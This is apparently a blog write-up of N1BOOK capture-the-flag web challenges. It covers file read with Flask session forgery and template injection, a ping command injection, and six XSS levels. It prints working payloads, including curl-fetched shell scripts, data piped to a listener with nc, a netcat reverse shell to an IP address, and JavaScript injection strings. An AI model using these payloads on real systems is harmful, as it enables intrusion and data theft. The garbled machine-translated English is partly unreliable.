N1BOOK writeup

Nu1L Team写的<<从0到1：CTFer成长之路>>The title of the inBUUOJIn the retrieval environment,Simple looked at the foundWEB的题目wpAnd the environment are all ready,Decided to do some and write blog the record.

N1BOOK of web afr_3 writeup

参考:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121490787

Home page has input box can submitname

The presentation gives aarticle让我们看,First take a look at the inside is what

url中可以传参数,Literally pass a see

任意文件读取漏洞

Found that can be read arbitrary files,But try to readflagCan't be directly read,这里需要对linuxThe file directory has certain understanding.

Using any file read loopholes in combination withproc读取源码

/proc 文件系统是一种内核和内核模块用来向进程 (process) 发送信息的机制 (所以叫做 /proc).这个伪文件系统让你可以和内核内部数据结构进行交互,获取 有关进程的有用信息,在运行中 (on the fly) 改变设置 (通过改变内核参数). 与其他文件系统不同,/proc 存在于内存之中而不是硬盘上.

/proc 文件系统可以被用于收集有用的关于系统和运行中的内核的信息.

下面是一些重要 的文件：

/proc/cpuinfo - CPU 的信息 (型号, 家族, 缓存大小等) /proc/meminfo - 物理内存、交换空间等的信息 /proc/mounts - 已加载的文件系统的列表 /proc/devices - 可用设备的列表 /proc/filesystems - 被支持的文件系统 /proc/modules - 已加载的模块 /proc/version - 内核版本 /proc/cmdline - 系统启动时输入的内核命令行参数

我们需要用到/proc/N/cmdline 进程启动命令,/proc/N/cwd 链接到进程当前工作目录,Using these two directory,我们读取../../../../proc/self/cmdline,For the current process startup command,发现是python server.py,然后我们再利用../../../../proc/self/cwd/server.pyLink to the process of the current working directoryserver.py文件,Then we can get directly to the source code,Get to the format of the disorderly,可以用IDEFormatting your code is convenient to see,我用的是vscodeFormatting code plug-ins,But is not very effective,Still need to manually adjust the,The following is after the adjustment.（后来发现f12Can see the normal format of the source code,This is pig nose,But coding is a problem and I don't know why）

<h1>Article Content:</h1> <br>#!/usr/bin/python
import os
from flask import ( Flask, render_template, request, url_for, redirect, session, render_template_string )
from flask_session import Session

app = Flask(__name__)
execfile(&#39;flag.py&#39;)
execfile(&#39;key.py&#39;)

FLAG = flag
app.secret_key = key
@app.route(&#34;/n1page&#34;, methods=[&#34;GET&#34;, &#34;POST&#34;])
def n1page():
    if request.method != &#34;POST&#34;:
        return redirect(url_for(&#34;index&#34;))
    n1code = request.form.get(&#34;n1code&#34;) or None
    if n1code is not None:
        n1code = n1code.replace(&#34;.&#34;, &#34;&#34;).replace(&#34;_&#34;, &#34;&#34;).replace(&#34;{&#34;,&#34;&#34;).replace(&#34;}&#34;,&#34;&#34;)
    if &#34;n1code&#34; not in session or session[&#39;n1code&#39;] is None:
        session[&#39;n1code&#39;] = n1code
    template = None
    if session[&#39;n1code&#39;] is not None:
        template = &#39;&#39;&#39;&lt;h1&gt;N1 Page&lt;/h1&gt; &lt;div class=&#34;row&gt; &lt;div class=&#34;col-md-6 col-md-offset-3 center&#34;&gt; Hello : %s, why you don&#39;t look at our &lt;a href=&#39;/article?name=article&#39;&gt;article&lt;/a&gt;? &lt;/div&gt; &lt;/div&gt; &#39;&#39;&#39; % session[&#39;n1code&#39;]
        session[&#39;n1code&#39;] = None
    return render_template_string(template)

@app.route(&#34;/&#34;, methods=[&#34;GET&#34;])
def index():
    return render_template(&#34;main.html&#34;)
@app.route(&#39;/article&#39;, methods=[&#39;GET&#39;])
def article():
    error = 0
    if &#39;name&#39; in request.args:
        page = request.args.get(&#39;name&#39;)
    else:
        page = &#39;article&#39;
    if page.find(&#39;flag&#39;)&gt;=0:
        page = &#39;notallowed.txt&#39;
    try:
        template = open(&#39;/home/nu11111111l/articles/{}&#39;.format(page)).read()
    except Exception as e:
        template = e

    return render_template(&#39;article.html&#39;, template=template)

if __name__ == &#34;__main__&#34;:
    app.run(host=&#39;0.0.0.0&#39;, debug=False)

SSTI模板注入漏洞

We need to pay attention to is the key to,server.pyRunning this path there are two files,key.py和flag.py,We cannot direct read leaky read arbitrary filesflag文件是因为flag关键词在article()Do the filter function,Then this way combining to consider before inputname有什么用,Because, after all, is actf题目,In total, so point information is clearly useful,Have a look at this part of the code

if "n1code" not in session or session['n1code'] is None: 
    session['n1code'] = n1code
template = None
if session['n1code'] is not None:
 template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' %
session['n1code']
session['n1code'] = None

nameThe value of the input box to fill in it isn1code的值,The code first topost传来n1code过滤一些SSTIThe key symbol（What's the use in the next section will say this）,Then see yousession里面有没有n1code这个字段,If there is no will givesession加个n1codeField and value ofPOST请求传来的n1codeThe value of the filtered value after the character,如果有就把sessionInto the template execution,So according to our normal incomingn1codeThe value of the then he'll filterSSTIAfter the key character,把n1codeThe value of the belt into the template to do,这里就会导致SSTI模板注入漏洞.但是SSTIThe key symbol filtered,The curly braces are filtered,There was no way to let the template code is executed to,So direct passn1codeTemplate injection method does not work.

伪造session完成SSTI利用

So we need to use forgedsession的方式来完成SSTIInjection vulnerabilities using,Because you will find your direct incomingn1codeThe value will be filtered,但是你session如果是伪造的,我们就可以让n1codeIs that we want to execute malicious code and not subject to the conditions of filter conditions,这非常关键,And we happen to have an arbitrary files read holes can readkey.py这个文件,先来讲讲session是什么.

sessionIs a kind of to the user's identity authentication,Is not your callek1ng我就会在session里写ek1ng,sessionIs stored in the browser, users can change,That otherwise other people change asession也叫ek1ngThat's not can easily by others pretend to be,所以说session[‘n1code’]经过key的加密,That is to say, in the service side thinkn1code是ek1ng,But in the clientn1code的值是‘ek1ng’经过key加密之后的值,So you need to use tools and reading holes from the arbitrary files to forge asession,从而达成对SSTI漏洞的利用.

First certainly need to look at the encryptedsession的key.py文件,

payload:article?name=../../../proc/self/cwd/key.py

得到key.py的内容key = 'Drmhze6EPcv0fN_81Bj-nA'

借助工具flask-session-cookie-manager来构造session,在命令行执行.\flask_session_cookie_manager3.py encode -s Drmhze6EPcv0fN_81Bj-nA -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"

After get fakesession

修改cookie中的session[‘n1code’]的值,就可以看到flag啦

And this really make sure there are still many pit,简单了解一下flaskTemplate injection will know,flaskThe template first approach can be imported into the firstos模块的基类,因为我们需要执行popen来读flag.py文件,But can importosThe base class for module which is it,这和pythonVersion is in itself have a relationship,Here you can go to have a look at before I writeHGAME finalIn that waySSTITemplate injection in the title is how to find a base class,The problem is to write a script,So I think this questions serious approach is to write a script to run about and see the results,But because I am not thinking of learning otherswp,Here is the lazy dog,It is not difficult to write a script for me,Mainly to learn thinking,Hope other reference I blog emersion chefs don't lazy ha ha ha.

N1BOOK of web 死亡ping命令 writeup

fuzz

是一个提供了pingOrder online website

ping是一个在shell中执行的命令,If we can be introduced to a malicious user input,可以在shellPerformed in any order,Want to read aflagApparently it is not hard to.

I use their own command line to do the test,Tests also met a lot of strange questions,But find a can take advantage of the point

我这里用&The command hangs in front of,Can perform the back of the order

But tried find the topic&过滤了

That seems tofuzzWhat see filtering,What can then think again,我用burpsuiteCaught and then tofuzz测试

Find for a long time did not find whatburpsuite可以用来fuzzThe method of single character,但是我看别人的wp都能用burpsuite来fuzz单个字符,好奇怪,Only regardless.

换行符绕过waf

In reference of otherswp,Bypass filtration perform hereshellCommand of the method is to use%0a,也就是urlCoding a newline to performshell命令,由于docker是没有bash、python程序的,官方wp中提到sh反弹是不行的,It can only be used in herecurlFirst get to write on my own server.sh文件,Will want to execute malicious code into the.sh文件中,In the title environment use firstcurl获取这个.shFile and in thetmp目录下,再执行.sh文件,The results of the command output to my server listening on port,下面是payload,Put one on the serverevil.sh文件,And has written in the filels -la /| nc ip看到ls的结果后）知道flag文件名字是FLAG,将evil.sh的内容改成cat /FLAG | nc ip,再执行一遍即可.

先让evil.sh的内容为ls -la / | nc ip port,

payload:ip=127.0.0.1%0acurl ip:port/evil.sh /tmp/evil.sh Will be placed on my serverevil.sh下载到靶机的tmp目录下

payload:ip=127.0.0.1%0achmod 777 /tmp/evil.sh用chmodCommand to the file execute permission（实际上不用chmodGive permissions can also perform）

nc -nvlp 8089In my open ports on the server to monitor,Behind this performevil.shCan I send the results to the server after

payload:ip=127.0.0.1%0ash /tmp/evil.sh 用sh命令执行evil.sh,执行evil.sh中的恶意代码

需要注意一下ls -la /这个命令,如果不加/,那么直接ls会在root目录下执行,FLAG放在根目录下,So you will find noflag文件,加了/后发现FLAGFiles in the root directory

Then changeevil.sh 里面内容为cat /FLAG | nc ip port就可以

payload:ip=127.0.0.1%0acurl ip:port/evil.sh /tmp/evil.sh Will be placed on my serverevil.sh下载到靶机的tmp目录下

payload:ip=127.0.0.1%0achmod777 /tmp/evil.sh用chmodCommand to the file execute permission（实际上不用chmodGive permissions can also perform）

nc -nvlp 8089In my open ports on the server to monitor,Behind this performevil.shCan I send the results to the server after

payload:ip=127.0.0.1%0ash /tmp/evil.sh 用sh命令执行evil.sh,执行evil.sh中的恶意代码

拿到flag啦,但是拿到flagI wonder why some of the steps again after a reboundshell不行,因为这里是有nc的,So I will try to usenc反弹shell了

在evil.sh中写入nc ip port -e /bin/sh,Then is same as above withip=127.0.0.1%0acurl ip:port/evil.sh /tmp/evil.sh把文件读到/tmpDirectory and useip=127.0.0.1%0ash /tmp/evil.sh执行evil.sh,Found that can successfully playshell…可能是BUUThe environment is not quite right？这就不清楚了.

Since the write command to perform within the files can be,Feeling can also directly to playshell吧,用payload:ip=127.0.0.1%0anc 39.108.253.105 8089 -e /bin/shTried find a filtered character,This want to really write command in the file withcurlThe way an download again can bypass some filter,Environment and the official titlewpSome not too right,I did not understand why the officialwpSaid can't playshell,有点迷惑,Just let it be the problem.

N1BOOK of web XSS闯关 writeup

Level 1

/level1?username=<script>alert()<script>

The simplest reflectivexss 在urlThe ginseng to do use.

官方wp中给出的/level1?username=xss%3Csvg/onload=alert()Don't understand and I can't use thispayload打通…挺迷的,General meaning should be inserted into asvg,然后在svg里面写个onload事件触发alert吧.

Level 2

Or try one of the most simplexss,发现不行,然后查看一下源码

if(location.search == ""){
	location.search = "?username=xss"
}
var username = 'xss';
document.getElementById('ccc').innerHTML= "Welcome " + escape(username);
    

传入的username参数被escape函数编码了,escape() 函数可对字符串进行编码,这样就可以在所有的计算机上读取该字符串. 该方法不会对ASCII 字母和数字进行编码,也不会对下面这些ASCII 标点符号进行编码： * @ - _ + . / . 其他所有的字符都会被转义序列替换.

escapeThe encoded string,It wouldn't take incoming content directly whenjs执行了,So said before is not an option,但是不代表不能XSS,The causes of hole is hereusername这个jsThe variables in the controlled by the user directly and onlyescapeThis code filtering,我们传入?username=';</script><script>alert()</script>//,这样js会执行

<script type="text/javascript">
var username = '';</script><script>alert()</script>//';
</script>

Closed with a quoteusername,然后再用一个</script>和前面的<script>闭合,后面插入scriptTags can execute arbitraryjs函数了.

官方解法是?username='-alert(),Actually about the solution to,但是不太懂-是什么意思,不过把-换成;After also can get through.

Level 3

if(location.search == ""){
	location.search = "?username=xss"
}
var username = 'xss';
document.getElementById('ccc').innerHTML= "Welcome " + username;
    

这里把escapeTo cancel the other didn't change anything？？

我用我自己Level 2中的payloadAlso can successfully get through,但是level 2官方的payload在level 3中不适用,This didn't understand why.

因为把escapeCancelled so hereinnerHTMLThe stitching has can use place,Here you can insert somehtmlThe tags to achievexss的效果.

官方wp中插入了img标签,To learn his approach,?username=xss<img src=x onerror=alert()>In fact, is a kind of useimg标签的onerror属性进行xss的常见做法.

onerror是一个js事件,As the picture does not exist triggered when,所以只要srcAttributes can't find the corresponding image,写在onerror中的jsStatements can be implemented.

Level 4

  	var time = 10;
  	var jumpUrl;
  	if(getQueryVariable('jumpUrl') == false){
  		jumpUrl = location.href;
  	}else{
  		jumpUrl = getQueryVariable('jumpUrl');
  	}
  	setTimeout(jump,1000,time);
  	function jump(time){
  		if(time == 0){
  			location.href = jumpUrl;
  		}else{
  			time = time - 1 ;
  			document.getElementById('ccc').innerHTML= `页面${time}秒后将会重定向到${escape(jumpUrl)}`;
  			setTimeout(jump,1000,time);
  		}
  	}
function getQueryVariable(variable)
{
       var query = window.location.search.substring(1);
       var vars = query.split("&");
       for (var i=0;i<vars.length;i++) {
               var pair = vars[i].split("=");
               if(pair[0] == variable){return pair[1];}
       }
       return(false);
}
  

There are also obvious,接收jumpUrl参数,And the parameter splicing intoinnerHTML,导致xss注入

但是这里jumpUrl有escapeString coding splicing in again,So here using the need to usejavascript伪协议来执行,由于这里有url跳转,Incoming parameters will be spelt inurl里面,在浏览器打开javascript：URL的时候,它会先运行URL中的代码,当返回值不为undefined的时候,Previous page link will be replaced with the code of the return value,payload：?jumpUrl=javascript:alert()

Level 5

  	if(getQueryVariable('autosubmit') !== false){
  		var autoForm = document.getElementById('autoForm');
  		autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');
  		autoForm.submit();
  	}else{
  		
  	}
function getQueryVariable(variable)
{
       var query = window.location.search.substring(1);
       var vars = query.split("&");
       for (var i=0;i<vars.length;i++) {
               var pair = vars[i].split("=");
               if(pair[0] == variable){return pair[1];}
       }
       return(false);
}
  

Find the code first receiveget请求参数autosubmit,如果不是false就继续执行,然后接收get请求参数action,如果接收到actionParameter study inactionParameters and submit the form,利用javascriptPseudo protocol can execute arbitrary in the submitted formjs代码.

payload：?action=javascript:alert()&autosubmit=1

Level 6

参考： https://juejin.cn/post/6891628594725847047http://www.mdlabs.cn/index.php/2022/04/01/buuctf-n1book-xss%E9%97%AF%E5%85%B31-%E3%80%90xss%E5%B0%8F%E7%BB%93%E3%80%91/

这个题目比较复杂,First is the source code directly to see insidejsLook not to come out is what,这里要利用Angular.jsThe template of injection to escape the sandbox,达成XSS漏洞的利用.

先判断存在angular模板注入

Only from the point of view to solve the problem,找一下angular 1.4.6的payload,Just get through

从https://juejin.cn/post/6891628594725847047#heading-8中,payload

?username={{x={y:''.constructor.prototype}; x.y.charAt=[].join; [1]|orderBy:'x=alert(1)}}'

直接打通,flag到手啦

Then let's look atAngularJS的模板注入,主要看这篇文章https://juejin.cn/post/6891628594725847047#heading-8

真看不懂….麻了,Find a time to seriously study the